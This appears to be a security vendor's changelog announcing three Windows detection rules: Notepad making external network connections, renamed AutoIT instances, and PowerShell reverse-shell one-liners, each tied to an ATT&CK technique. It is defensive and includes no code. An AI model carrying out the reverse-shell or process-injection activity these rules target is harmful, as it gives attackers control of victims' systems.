==================================================

CREATED: WIN-NOTEPAD-EXTERNAL-NETCONN (#1990)

Description

This detector identifies Windows Notepad establishing external network connections. Adversaries commonly use Notepad as a target to inject code for malicious activity, proxying network connections through the process.

ATT&CK Technique T1055

==================================================

CREATED: WIN-AUTOIT-RENAMED (#2000)

Description

This detector identifies renamed instances of AutoIT. Adversaries use this administrative tool to deploy malware in the form of scripts.

ATT&CK Technique T1072

==================================================

CREATED: WIN-POWERSHELL-TCP-REV-SHELL (#2005)

Description

This detector identifies PowerShell with command line arguments indicating the use of a TCP reverse shell one-liner. This technique is used by adversaries to establish control of a system.

ATT&CK Technique T1086

Did this answer your question?